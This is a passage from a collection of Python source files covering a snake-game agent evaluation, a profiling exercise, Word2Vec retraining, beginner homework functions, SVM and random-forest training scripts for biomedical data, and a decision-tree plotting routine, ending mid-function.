observation.copy()\n ctrl_agent_index = [obs['controlled_snake_index']]\n board_width = obs['board_width']\n board_height = obs['board_height']\n beans_positions = obs[1]\n snakes_positions = {key: obs[key] for key in obs.keys() & {2, 3}}\n snake_map = make_grid_map(board_width, board_height, beans_positions, snakes_positions)\n state_map = np.squeeze(np.array(snake_map), axis=2)\n\n greedy_info = {'state': state_map,\n 'beans': beans_positions,\n 'snakes': snakes_positions,\n 'width': board_width,\n 'height': board_height,\n 'ctrl_agent_index': ctrl_agent_index}\n return greedy_info\n\n\n # greedy_snake(state_map, beans_positions, snakes_positions, board_width, board_height, ctrl_agent_index)\n\ndef get_join_actions(obs, algo_list):\n first_action = get_actions(obs[0], algo_list[0])\n second_action = get_actions(obs[1], algo_list[1])\n actions = np.zeros(2)\n actions[0] = first_action[:]\n actions[1] = second_action[:]\n return actions\n\n\ndef run_game(env, algo_list, episode, verbose=False):\n width = env.board_width\n height = env.board_height\n obs_dim = 18\n agent_index = [0, 1]\n total_reward = np.zeros(2)\n num_win = np.zeros(3)\n\n for i in range(1, episode + 1):\n episode_reward = np.zeros(2)\n state = env.reset()\n\n # obs = get_observations(state, agent_index, obs_dim, height, width)\n\n action_list = get_join_actions(state, algo_list)\n joint_action = env.encode(action_list)\n\n step = 0\n if verbose:\n print_state(state, action_list, step)\n\n while True:\n next_state, reward, done, _, info = env.step(joint_action)\n episode_reward += reward\n\n if done:\n if np.sum(episode_reward[0]) > np.sum(episode_reward[1]):\n num_win[0] += 1\n elif np.sum(episode_reward[0]) < np.sum(episode_reward[1]):\n num_win[1] += 1\n else:\n num_win[2] += 1\n\n if not verbose:\n print('.', end='')\n if i % 100 == 0 or i == episode:\n print()\n break\n\n state = next_state\n step += 1\n # obs = get_observations(state, info, agent_index, obs_dim, height, width)\n\n action_list = get_join_actions(state, algo_list)\n joint_action = env.encode(action_list)\n\n if verbose:\n print_state(state, action_list, step)\n\n total_reward += episode_reward\n\n # calculate results\n total_reward /= episode\n print(f'\\nResult base on {episode} ', end='')\n print('episode:') if episode == 1 else print('episodes:')\n\n header = ['Name', algo_list[0], algo_list[1]]\n data = [['score', total_reward[0], total_reward[1]],\n ['win', 
num_win[0], num_win[1]]]\n print(tabulate(data, headers=header, tablefmt='pretty', floatfmt='.3f'))\n\n\nif __name__ == \"__main__\":\n env_type = 'snakes_1v1'\n\n game = make(env_type, conf=None)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--my_ai\", default=\"dqn\", help=\"dqn/random/greedy\")\n parser.add_argument(\"--opponent\", default=\"greedy\", help=\"dqn/random/greedy\")\n parser.add_argument(\"--episode\", default=100)\n args = parser.parse_args()\n\n # [greedy, dqn, random]\n agent_list = [args.my_ai, args.opponent]\n run_game(game, algo_list=agent_list, episode=args.episode, verbose=False)\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
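The results table at the end of `run_game` goes through `tabulate`; here is the same layout with made-up numbers:

```python
from tabulate import tabulate

header = ['Name', 'dqn', 'greedy']
data = [['score', 12.3, 10.1],
        ['win', 60, 40]]
print(tabulate(data, headers=header, tablefmt='pretty'))
```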
+{"seq_id":"52041810","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Tuneup assignment\"\"\"\n\n__author__ = 'Rob Spears (GitHub: Forty9Unbeaten)'\n\nimport cProfile\nimport pstats\nimport functools\nimport timeit\n\n\ndef profile(func):\n '''A function that can be used as a decorator to measure performance'''\n @functools.wraps(func)\n def pro_wrapper(*args, **kwargs):\n pro = cProfile.Profile()\n pro.enable()\n duplicates = func(*args, **kwargs)\n pro.disable()\n stats = pstats.Stats(pro)\n stats.strip_dirs().sort_stats('cumulative').print_stats()\n return duplicates\n return pro_wrapper\n\n\ndef read_movies(src):\n '''Returns a list of movie titles'''\n print('Reading file: {}'.format(src))\n with open(src, 'r') as f:\n return f.read().splitlines()\n\n\n# uncomment next line to decorate function with time measurement statistics\n@profile\ndef find_duplicate_movies(src):\n '''Returns a list of duplicate movies from a src list'''\n movies = read_movies(src)\n unique = set()\n return set(movie for movie in movies if movie in unique\n or unique.add(movie))\n\n\ndef timeit_helper():\n '''Part A: Obtain some profiling measurements using timeit'''\n\n # change these variables to dictate\n # how many times timeit runs and repeats\n number = 2\n repeat = 3\n\n t = timeit.Timer(stmt='''t.main()''',\n setup='''import tuneup as t''')\n results = t.repeat(number=number, repeat=repeat)\n min_time = min([res/number for res in results])\n print(\n '\\n\\tBest time across {} repeats of {} runs per repeat: {:.3f}'.format(\n repeat, number, min_time)\n )\n\n\ndef main():\n '''Computes a list of duplicate movie entries'''\n result = find_duplicate_movies('movies.txt')\n print('Found {} duplicate movies:'.format(len(result)))\n print('\\n'.join(result))\n\n\nif __name__ == '__main__':\n # uncomment next line to gather time measurements with timeit module\n # timeit_helper()\n main()\n","sub_path":"tuneup.py","file_name":"tuneup.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"472542047","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 27 20:00:24 2018\r\n\r\n@author: YUAN\r\n\"\"\"\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\npath = r\"C:\\Users\\ADM\\Desktop\\UBS Quant Competition\\Price Data\" #文件夹目录\r\nfiles= os.listdir(path) #得到文件夹下的所有文件名称\r\nfactors = {}\r\nfor file in files: #遍历文件夹\r\n if not os.path.isdir(file): #判断是否是文件夹,不是文件夹才打开\r\n factors[file[:-4]] = pd.read_csv(path + \"/\" + file, index_col=0)","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"613642466","text":"import logging\nimport os\nfrom gensim.models import Word2Vec\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlogging.debug('start')\n# logging.debug()\n# logging.info()\nclass MySentences(object):\n\tdef __init__(self, dirname):\n\t\tself.dirname = dirname\n\n\tdef __iter__(self):\n\t\tfor fname in os.listdir(self.dirname):\n\t\t\tprint (\"- > File name: \"+os.path.join(self.dirname, fname))\n\t\t\tfor line in open(os.path.join(self.dirname, fname)):\n\t\t\t\tyield line.split()\n\nsentences = MySentences('text')\nlens = 0\nfor i, sent in enumerate(sentences):\n\tlens += len(sent)\n\nmodel = Word2Vec.load('model')\nmodel.train(sentences,total_examples=lens, epochs=model.iter)\n\nprint(\" < -o- > vocab length:\")\nprint(len(model.wv.vocab))\n\nmodel.save('model')\n\n\n\n","sub_path":"trainme.py","file_name":"trainme.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"615773147","text":"# globel variable l = 10\n\"\"\"l = 10\ndef shubham(n):\n l = 12 #local variable\n print(n,\"i am shubham\",l)\nshubham(\"great learner\")\nprint(l)\"\"\"\n# Global key\na =89\ndef jha():\n a =10\n def jhaji():\n global a\n a=20\n # print(\"before calling jhaji\",a)\n jhaji()\n print(\"after calling jhaji\",a)\njha()\nprint(a)","sub_path":"global1.py","file_name":"global1.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24916815","text":"#!/usr/bin/env python\n# HW03_ex06\n# (1) Please comment your code.\n# (2) Please be thoughtful when naming your variables.\n# (3) Please remove development code before submitting.\n################################################################################\n# Exercise 1\n# When you submit only include your final function: compare\n\ndef compare(x,y):\n\tif(x > y): #compare x,y\n\t\treturn 1\n\telif(x ==y):\n\t\treturn 0\n\telse:\n\t\treturn -1\n\t\n\n################################################################################\n# Exercise 2\n# When you submit only include your final function: hypotenuse\n# Do develop incrementally. Do not share here.\nimport math\ndef hypotenuse(side1, side2):\n\thypotenuse_squared = side1** 2 + side2 ** 2 # calculating hypotenuse squared\n\thyp = math.sqrt(hypotenuse_squared) # calculating square root of hypotenuse squared\n\treturn hyp\n\n\n\n\n################################################################################\n# Exercise 3\n# When you submit only include your final function: is_between\n\ndef is_between(x,y,z):\n\tif(x <= y <= z):\n\t\treturn True\n\telse: \n\t\treturn False\n\n\n################################################################################\n# Exercise 6\n# When you submit only include your final function: is_palindrome\n\ndef is_palindrome(s):\n\treversed = s[::-1] #reversing the string\n\tif s == reversed: \n\t\treturn True\n\telse:\n\t\treturn False\n\n\n################################################################################\n# Exercise 7\n# When you submit only include your final function: is_power\n\ndef is_power(a,b):\n\t\tif (a%b == 0 and (a/b) % b == 0):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\n################################################################################\n\ndef main():\n\t\"\"\"Your functions will be called within this function.\"\"\"\n\t############################################################################\n\t# Use this space temporarily to call functions in development:\n\tprint(\"Hello World!\")\n\t\n\n\n\n\n\n\n ############################################################################\n # Uncomment the below to test and before commiting:\n # # Exercise 1\n\t#compare(1,1)\n\t#compare(1,2)\n\t#compare(2,1)\n # # Exercise 2\n\t#hypotenuse(1,1)\n\t#hypotenuse(3,4)\n\t#hypotenuse(1.2,12)\n # # Exercise 3\n\t#is_between(1,2,3)\n\t#is_between(2,1,3)\n\t#is_between(3,1,2)\n\t#is_between(1,1,2)\n # # Exercise 6\n\tis_palindrome(\"Python\")\n\tis_palindrome(\"evitative\")\n\tis_palindrome(\"sememes\")\n\tis_palindrome(\"oooooooooooo\")\n # # Exercise 7\n\tis_power(28,3)\n\tis_power(27,3)\n\tis_power(248832,12)\n\tis_power(248844,12)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"HW03_ex06.py","file_name":"HW03_ex06.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"648523925","text":"\"\"\"\nThis script is used to train an SVM classifier on Changgung datasets, \nand test on Beijing/Cambridge or other datasets.\nOne of the two training groups must be Changgung healthy subjects.\nAll of the training data are the first scan of each patient.\nThe healthy dynamic networks were used to balance positive and negative ratio\n\"\"\"\n\nimport os, json\nimport numpy as np\nimport mmdps_locale\nfrom mmdps.proc import atlas, netattr\nfrom mmdps_util import stats_utils, io_utils, result_utils\nfrom sklearn import svm, model_selection\n\natlasobj = atlas.get('brodmann_lr')\n\n# load specific nets as a list\nChanggungPatientNets = io_utils.loadSpecificNets(mmdps_locale.ChanggungAllFullPath, atlasobj, subjectList = os.path.join(mmdps_locale.ChanggungRootPath, 'CS_subjects.txt'))\nChanggungHealthyNets = io_utils.loadRandomDynamicNets(mmdps_locale.ChanggungAllFullPath, atlasobj, totalNum = len(ChanggungPatientNets), scanList = os.path.join(mmdps_locale.ChanggungRootPath, 'normal_scans.txt'))\n\ntestNets = io_utils.loadSpecificNets(mmdps_locale.ChanggungAllFullPath, atlasobj, subjectList = os.path.join(mmdps_locale.ChanggungRootPath, 'CS_subjects.txt'), timeCase = 2)\n\nprint('len of ChanggungPatientNets: %d' % len(ChanggungPatientNets))\nprint('len of testNets: %d' % len(testNets))\n\n# prepare all training \nsig_connections = stats_utils.filter_sigdiff_connections(ChanggungPatientNets, ChanggungHealthyNets)\nX1 = np.zeros((len(ChanggungHealthyNets), 1)) # healthy\ny1 = -1 * np.ones((len(ChanggungHealthyNets), 1)) # label = -1 for healthy\nX2 = np.zeros((len(ChanggungPatientNets), 1)) # patient\ny2 = np.ones((len(ChanggungPatientNets), 1)) # label = 1 for patients\nZ = np.zeros((len(testNets), 1)) # 3rd party test set\ny3 = np.ones((len(testNets), 1))\nfor c in sig_connections:\n\tnormalCList = result_utils.getAllFCAtIdx(c[0], c[1], ChanggungHealthyNets)\n\tX1 = np.insert(X1, 0, normalCList, axis = 1)\n\tpatientCList = result_utils.getAllFCAtIdx(c[0], c[1], ChanggungPatientNets)\n\tX2 = np.insert(X2, 0, patientCList, axis = 1)\n\ttestList = result_utils.getAllFCAtIdx(c[0], c[1], testNets)\n\tZ = np.insert(Z, 0, testList, axis = 1)\nX = np.concatenate([X1[:, :-1], X2[:, :-1]])\ny = np.concatenate((y1, y2)).ravel()\nZ = Z[:, :-1]\n\n# classifier\nclassifier = svm.SVC(kernel = 'linear')\n\n# train it on the first scans\nclassifier.fit(X, y)\n\n# test it on other dataset\naccuracy = classifier.score(Z, y3)\nprint('Test accuracy: %1.4f' % accuracy)\n","sub_path":"SVM/changgung patient vs others dynamic.py","file_name":"changgung patient vs others dynamic.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"547189228","text":"# Load\nimport sys, os, ast\nsys.path.insert(0, \"src/utilities\")\n\nimport pandas as pd\nimport numpy as np\n\nimport prismml_utilities as prism_utilities\nimport prism_machine_learning as prismml\nimport PrismData as PrismData\n\n# Inputs\nfrom argparse import ArgumentParser\nparser = ArgumentParser(description=\"Select training, validation proteins\")\nparser.add_argument(\"-n\", dest=\"RUN_NAME\", default = \"paper__RF__all__1\", help=\"RUN_NAME\")\nparser.add_argument(\"-l\", dest=\"LINEAR_REGRESSION\", default = False, help=\"Run linear regression model instead of RF model\")\nparser.add_argument(\"-d\", dest=\"DATASET_PATH\", default = \"data/preprocessed.pkl\", help=\"Dataset path\")\nparser.add_argument(\"-s\", dest=\"SUBSET\", default = False, help=\"TREES\")\nparser.add_argument(\"-i\", dest=\"VALID_IDXS\", default = False, help=\"VALID_IDXS\")\nparser.add_argument(\"-j\", dest=\"TRAIN_IDXS\", default = False, help=\"TRAIN_IDXS\")\nparser.add_argument(\"-f\", dest=\"FEATURES\", default = \"all\", help=\"FEATURES\")\nparser.add_argument(\"-t\", dest=\"TREES\", default = 150, help=\"TREES\")\nparser.add_argument(\"-x\", dest=\"EXCLUDE_MISSING\", default=2, help=\"Exclude missing Rosetta values (1), or Rosetta and GEMME (2)\")\nparser.add_argument(\"-v\", dest=\"VERBOSE\", default=0, help=\"Print error messages\")\nargs = parser.parse_args()\nverbose = int(args.VERBOSE)\n\n# Duration\nfrom datetime import datetime\nstart_time = datetime.now()\n\nLINEAR_FLAG = args.LINEAR_REGRESSION\nif LINEAR_FLAG: print(\"Linear regression model set\")\n\n# Generate features\nprint(\"\\nChosen features:\", args.FEATURES)\npreprocessed_path = str(args.DATASET_PATH)\nprint(\"Loading from preprocessed path:\", preprocessed_path)\n\n# Big load script\ndfs_proc, dfs_names, dfs_raw = prismml.generate_load_preprocessed_datasets(\"data/preprocessed/prism*.txt\",\n normalize_mave_only = True,\n preprocessed_path=preprocessed_path)\n\n# Only include rows with present MAVE score\nfor df in dfs_raw: df.dropna(subset = [\"score\"], inplace = True)\nfor df in dfs_proc: df.dropna(subset = [\"score\"], inplace = True)\nfor df_raw, df_proc in zip(dfs_raw, dfs_proc):\n df_proc[\"mave_p0\"] = df_raw[\"mave_p0\"]\n\n# Extra pre-proc\n#dfs_raw_names = dfs_names.copy()\n#dfs_proc_subset = pd.Series(prismml.filter_numeric_fillnans_dfs(dfs_proc))\n\nfrom copy import deepcopy\ndfs_raw_scores = dfs_proc.apply(deepcopy)\nfor i in range(len(dfs_raw_scores)):\n dfs_raw_scores[i][\"score\"] = dfs_raw[i][\"score\"]\n#dfs_raw_scores = pd.Series(prismml.filter_numeric_fillnans_dfs(dfs_raw_scores))\n\n# stats df\nstats_df_all = prismml.generate_stats_df(dfs_proc, dfs_names)\n\n# Extract experiments only with Rosetta and Gemme values above 0.3, and within 0.2 of each other\nif args.SUBSET:\n print(\"\\nExtracting subset ... 
Only including dataset if ddG OR ddE correlation > 0.3\")\n min_threshold = 0.3\n filtered_names = []\n for i, gem, ros in zip(enumerate(stats_df_all.index), stats_df_all[\"Gemme\"], stats_df_all[\"Rosetta\"]):\n if gem > min_threshold or ros > min_threshold: filtered_names.append(i[1])\n\n def extract_subset(dfs_list, dfs_names, subset):\n return(pd.Series([dfs_list[i] for i in range(len(dfs_names)) if dfs_names[i] in subset]))\n\n dfs_proc_subset = extract_subset(dfs_proc, dfs_names, filtered_names)\n dfs_raw_subset = extract_subset(dfs_raw, dfs_names, filtered_names)\n dfs_raw_scores_subset = extract_subset(dfs_raw_scores, dfs_names, filtered_names)\n dfs_names_subset = extract_subset(dfs_names, dfs_names, filtered_names)\n if verbose >= 1: print(\"\\nExtracted subset ({}):\\n{}\".format(str(len(dfs_names_subset)), dfs_names_subset))\n\nelse:\n dfs_proc_subset = dfs_proc\n dfs_raw_subset = dfs_raw\n dfs_raw_scores_subset = dfs_raw_scores\n dfs_names_subset = dfs_names\n\n#print(\"\\nExtracted subset (\" + len(dfs_names_subset) +\"):\", dfs_names_subset)\n\nif verbose > 1:\n for x, name in zip([dfs_proc_subset, dfs_raw_scores_subset, dfs_names_subset, dfs_raw_subset], [\"dfs_proc_subset\", \"dfs_raw_scores_subset\", \"dfs_names_subset\", \"dfs_raw_subset\"]):\n print(\"\\n\" + name, \"type:\", type(x))\n try: print(\"Len:\", len(x), \"First item shape:\", x[0].shape, type(x[0]))\n except: print(\"Len:\", len(x), \"First item len:\", len(x[0]), type(x[0]))\n\nstats_df_subset = prismml.generate_stats_df(dfs_proc_subset, dfs_names_subset)\n\n# Check if selected specific features\nif args.FEATURES == \"all\": chosen_features_re = \"gemme_aa_p0|gemme_aa_wt_p$|gemme_M_p0|ros_aa_p0|ros_aa_wt_p$|ros_M_p0|mave_wt|mave_any\"\nelse: chosen_features_re = \"|\".join(ast.literal_eval(args.FEATURES))\ninclude = dfs_proc_subset[0].columns.str.contains(\"^score$|\" + chosen_features_re)\n\nchosen_features = dfs_proc[0].columns[include]\ndfs_proc_subset = pd.Series([df[chosen_features] for df in dfs_proc_subset])\ndfs_raw_scores_subset = pd.Series([df[chosen_features] for df in dfs_raw_scores_subset])\nprint(dfs_proc_subset[0].columns)\n\n######\n# ML\n# Load training datasets\n######\n\n# Choose train idxs subset from input args\nif args.VALID_IDXS: valid_ix_list = ast.literal_eval(args.VALID_IDXS)\nelse: valid_ix_list = [0]\nprint(\"valid_ix_list:\", valid_ix_list, type(valid_ix_list))\n\nif args.TRAIN_IDXS: train_ix_list = ast.literal_eval(args.TRAIN_IDXS)\nelse: train_ix_list = list(range(len(dfs_proc_subset)))\nprint(\"train_ix_list (input, before filtering):\", train_ix_list, type(train_ix_list))\n\n\ndef get_dataset(dataset_proc, dataset_raw, dataset_names, chosen_features_re, valid_ix_list):\n # Setup\n train_ix_list = list(range(len(dfs_names_subset)))\n\n # Select features\n include = dataset_proc[0].columns.str.contains(\"^score$|\" + chosen_features_re)\n chosen_features = dataset_proc[0].columns[include]\n\n dataset_proc = pd.Series([df[chosen_features] for df in dataset_proc])\n dataset_raw = pd.Series([df[chosen_features] for df in dataset_raw])\n if verbose: print(dataset_proc[0].columns)\n\n # Numeric values only\n dataset_proc = prismml.filter_numeric_fillnans_dfs(dataset_proc)\n\n # Removal of all proteins by name in train_ix_list\n train_names = prismml.get_proteins_by_idxs(train_ix_list, dataset_names)\n valid_names = prismml.get_proteins_by_idxs(valid_ix_list, dataset_names)\n train_protein_idxs = prismml.get_idxs_by_proteins(train_names, dataset_names)\n\n print(\"Removing 
validation proteins from training proteins\")\n exclude = np.array(train_names.isin(valid_names), dtype = bool)\n train_ix_list = list(pd.Series(train_ix_list)[~exclude])\n\n train_names = prismml.get_proteins_by_idxs(train_ix_list, dataset_names)\n train_protein_idxs = prismml.get_idxs_by_proteins(train_names, dataset_names)\n\n valid_names = prismml.get_proteins_by_idxs(valid_ix_list, dataset_names)\n if verbose: print(\"Training set:\\n\", train_names, \"\\nValidation set:\\n\", valid_names)\n\n\n # training sets. Remove validation proteins from training set\n train_X, train_y, valid_X, valid_y = prismml.generate_train_valid_set_dfs(dataset_proc, valid_ix_list = valid_ix_list,\n train_ix_list = train_ix_list)\n _, _, valid_X_raw, valid_y_raw = prismml.generate_train_valid_set_dfs(dataset_raw,\n valid_ix_list = valid_ix_list,\n train_ix_list = train_ix_list)\n\n if verbose > 1: print(\"Train/valid x/y\", len(train_X), len(train_y), len(valid_X), len(valid_y))\n\n return(train_X, train_y, valid_X, valid_y_raw)\n\nchosen_features_re = \"ros_aa_p0|ros_aa_wt_p$|ros_M_p0|gemme_aa_p0|gemme_aa_wt_p$|gemme_M_p0|mave_wt|mave_any\"\ntrain_X, train_y, valid_X, valid_y_raw = get_dataset(dfs_proc_subset, dfs_raw_scores_subset, dfs_names_subset, chosen_features_re, valid_ix_list)\n\nif int(args.EXCLUDE_MISSING) >= 1 and \"ros_aa_wt_p\" in train_X.columns:\n print(\"Filtering out missing Rosetta values\")\n print(\"Before:\", train_X.shape, valid_X.shape)\n missing_train = np.array(train_X[\"ros_aa_wt_p\"] == -100, dtype = bool)\n train_X, train_y = train_X[~missing_train], train_y[~missing_train]\n missing_val = np.array(valid_X[\"ros_aa_wt_p\"] == -100, dtype = bool)\n valid_X, valid_y_raw = valid_X[~missing_val], valid_y_raw[~missing_val]\n print(\"After:\", train_X.shape, valid_X.shape)\n\nif int(args.EXCLUDE_MISSING) >= 2 and \"gemme_aa_wt_p\" in train_X.columns:\n print(\"Filtering out missing GEMME values\")\n print(\"Before:\", train_X.shape, valid_X.shape)\n missing_train = np.array(train_X[\"gemme_aa_wt_p\"] == -100, dtype = bool)\n train_X, train_y = train_X[~missing_train], train_y[~missing_train]\n missing_val = np.array(valid_X[\"gemme_aa_wt_p\"] == -100, dtype = bool)\n valid_X, valid_y_raw = valid_X[~missing_val], valid_y_raw[~missing_val]\n print(\"After:\", train_X.shape, valid_X.shape)\n\n# Set model\nif LINEAR_FLAG:\n print(\"Linear regression model set\")\n from sklearn.linear_model import LinearRegression\n model = LinearRegression()\nelse:\n print(\"Random Forest model set\")\n from sklearn.ensemble import RandomForestRegressor\n model = RandomForestRegressor(n_estimators = int(args.TREES), max_features = \"sqrt\", min_samples_leaf=15)\n\n# Train model\nmodel.fit(train_X, train_y)\n\n# Dump model to file\nfrom joblib import dump, load\ndump(model, \"trained_RF_model.joblib\")\n\n# Evaluate\nprint(\"Train performance spearman (norm):\", prismml.test_performance_continuous(model, train_X, train_y, include = \"spearman\"))\nprint(\"Valid performance spearman (raw):\", prismml.test_performance_continuous(model, valid_X, valid_y_raw, include = \"spearman\"))\nprint(\"Valid performance spearman (raw -> recording...):\", prismml.test_performance_continuous(model, valid_X, valid_y_raw, include = \"spearman\"))\n\n# Record performance\nexit_value = prism_utilities.csv_save_record_performance(model, train_X, train_y, valid_X, valid_y_raw, dfs_raw_scores_subset, dfs_names_subset,\n valid_ix_list, train_ix_list, stats_df_subset, chosen_features, start_time,\n RUN_NAME = args.RUN_NAME, 
verbose = 1)\n\nif exit_value != True:\n print(\"ERROR: csv_save_record_performance exited with error code\")\n","sub_path":"2021/ML-variants-Hoie-et-al/src/RandomForest_model.py","file_name":"RandomForest_model.py","file_ext":"py","file_size_in_byte":10272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
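The counterpart to the `dump` call above, for reusing the trained model in a later session (the path is the one hard-coded in the script; `valid_X` stands for any feature matrix with the same columns the model was trained on):

```python
from joblib import load

model = load('trained_RF_model.joblib')
# predictions = model.predict(valid_X)
```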
+{"seq_id":"559610505","text":"import math\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport sys\n\nimport os\nparent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, parent_dir)\nimport addtext\nimport linegraph\nimport patchplotting\n\n\ndef main(figureSaveLocation):\n \"\"\"Create two images that demonstrate the partition induced by a decision tree.\n\n @type figureSaveLocation - str\n @use figureSaveLocation - The location where the figure will be saved.\n \"\"\"\n\n # Define the decision tree split points and partitions.\n splitValues = [5, 3, 6, 2, 8, 8, 7]\n splitVariables = [r'$x$', r'$y$', r'$y$', r'$x$', r'$y$', r'$x$', r'$x$']\n nodeLabels = splitVariables + [str(i) for i in range(len(splitValues) + 1)]\n partitionLabels = [str(i) for i in range(len(splitValues) + 1)]\n splitValues = splitValues + ([None] * (len(splitValues) + 1)) # Pad out the splitValues with empty values for the leaves.\n splitVariables = splitVariables + ([None] * (len(splitValues) + 1)) # Pad out the splitVariables with empty values for the leaves.\n\n # Define the axes sizes.\n axisMinValue = 0.0\n axisMaxValue = 10.0\n\n # Define the decision tree node sizes and positions.\n nodeWidth = 1.0\n nodeHeight = 1.0\n gapBetweenLevels = 1.0\n gapBetweenCousins = 0.5\n nodeDepths = [int(math.log(i+1,2)) for i in range(len(splitValues))]\n maxDepth = max(nodeDepths)\n nodesAtDepth = [(2**nodeDepths[i], nodeDepths[:i].count(nodeDepths[i]) + 1) for i in range(len(nodeDepths))] # The depth of the node along with the position on the row (leftmost is 1).\n nodeCenterXValues = []\n nodeCenterYValues = [axisMaxValue - (i * nodeHeight + ((i + 1) * gapBetweenLevels) + (nodeHeight / 2)) for i in nodeDepths]\n for i in range(len(splitValues)):\n splits = [(axisMaxValue / nodesAtDepth[i][0]) * j for j in range(nodesAtDepth[i][0] + 1)]\n positions = [(splits[j] + splits[j+1]) / 2 for j in range(nodesAtDepth[i][0])]\n nodeCenterXValues.append(positions[nodesAtDepth[i][1] - 1])\n treeEdgesXValues = []\n treeEdgesYValues = []\n treeEdgeLabels = []\n for i in range(len(splitValues)):\n if not splitValues[i]:\n # If i is the index of a leaf node, then continue as the leaf does not hold any information about the partition.\n continue\n leftChildIndex = int((i * 2) + 1)\n rightChildIndex = int((i * 2) + 2)\n treeEdgesXValues += [[nodeCenterXValues[i], nodeCenterXValues[leftChildIndex]], [nodeCenterXValues[i], nodeCenterXValues[rightChildIndex]]]\n treeEdgesYValues += [[nodeCenterYValues[i], nodeCenterYValues[leftChildIndex]], [nodeCenterYValues[i], nodeCenterYValues[rightChildIndex]]]\n treeEdgeLabels += [r'$\\leq$' + str(splitValues[i]), r'$>$' + str(splitValues[i])]\n edgeCenterXValues = [sum(i) / 2 for i in treeEdgesXValues]\n edgeCenterXValues = [edgeCenterXValues[i] + 0.5 if i % 2 else edgeCenterXValues[i] - 0.5 for i in range(len(edgeCenterXValues))]\n edgeCenterYValues = [sum(i) / 2 for i in treeEdgesYValues]\n\n # Determine the partitions used, and the locatations for the labels of the partitions.\n partitionXValues = []\n partitionYValues = []\n partitionWidths = []\n partitionHeights = []\n partitionLabelXValues = []\n partitionLabelYValues = []\n for i in range(len(splitValues)):\n if not splitValues[i]:\n # If i is the index of a leaf node, then continue as the leaf does not hold any information about he partition.\n continue\n\n valueOfI = splitValues[i]\n variableOfI = splitVariables[i]\n\n # 
\n # Determine the partitions used, and the locations for the labels of the partitions.\n partitionXValues = []\n partitionYValues = []\n partitionWidths = []\n partitionHeights = []\n partitionLabelXValues = []\n partitionLabelYValues = []\n for i in range(len(splitValues)):\n if not splitValues[i]:\n # If i is the index of a leaf node, then continue as the leaf does not hold any information about the partition.\n continue\n\n valueOfI = splitValues[i]\n variableOfI = splitVariables[i]\n\n # Determine the starting bounds for the partition rectangle.\n currentVarLessThan = axisMaxValue\n currentVarMoreThan = axisMinValue\n otherVarLessThan = axisMaxValue\n otherVarMoreThan = axisMinValue\n\n # Determine if the current node is a leaf node (i.e. it has no children).\n isLeaf = False\n leftChildIndex = int((i * 2) + 1)\n if (not splitValues[leftChildIndex]):\n # If the left child does not exist, then the current node is the parent of two leaves\n # (as each node either has two children (internal node) or none (leaf node)).\n currentNodeIndex = i\n while currentNodeIndex > 0:\n # Loop through all the ancestors of the current node, and determine the partition that they induce.\n currentNodeIsLeftChild = True if currentNodeIndex % 2 == 1 else False\n if currentNodeIsLeftChild:\n parentNodeIndex = int((currentNodeIndex - 1) / 2)\n currentNodeIndex = parentNodeIndex\n else:\n parentNodeIndex = int((currentNodeIndex - 2) / 2)\n currentNodeIndex = parentNodeIndex\n\n parentNodeVariable = splitVariables[parentNodeIndex]\n parentNodeValue = splitValues[parentNodeIndex]\n if parentNodeVariable != variableOfI:\n if currentNodeIsLeftChild:\n otherVarLessThan = min(otherVarLessThan, parentNodeValue)\n else:\n otherVarMoreThan = max(otherVarMoreThan, parentNodeValue)\n else:\n if currentNodeIsLeftChild:\n currentVarLessThan = min(currentVarLessThan, parentNodeValue)\n else:\n currentVarMoreThan = max(currentVarMoreThan, parentNodeValue)\n if variableOfI == r'$x$':\n partitionXValues += [currentVarMoreThan, valueOfI]\n partitionYValues += [otherVarMoreThan, otherVarMoreThan]\n height = otherVarLessThan - otherVarMoreThan\n partitionWidths += [valueOfI - currentVarMoreThan, currentVarLessThan - valueOfI]\n partitionHeights += [height, height]\n partitionLabelXValues.append((valueOfI + currentVarMoreThan) / 2.0)\n partitionLabelYValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelXValues.append((currentVarLessThan + valueOfI) / 2.0)\n partitionLabelYValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n else:\n partitionXValues += [otherVarMoreThan, otherVarMoreThan]\n partitionYValues += [currentVarMoreThan, valueOfI]\n width = otherVarLessThan - otherVarMoreThan\n partitionWidths += [width, width]\n partitionHeights += [valueOfI - currentVarMoreThan, currentVarLessThan - valueOfI]\n partitionLabelXValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelYValues.append((valueOfI + currentVarMoreThan) / 2.0)\n partitionLabelXValues.append((otherVarLessThan + otherVarMoreThan) / 2.0)\n partitionLabelYValues.append((currentVarLessThan + valueOfI) / 2.0)\n\n # Create the plot for the decision tree.\n currentFigure = plt.figure()\n gsTree = gridspec.GridSpec(10, 10)\n 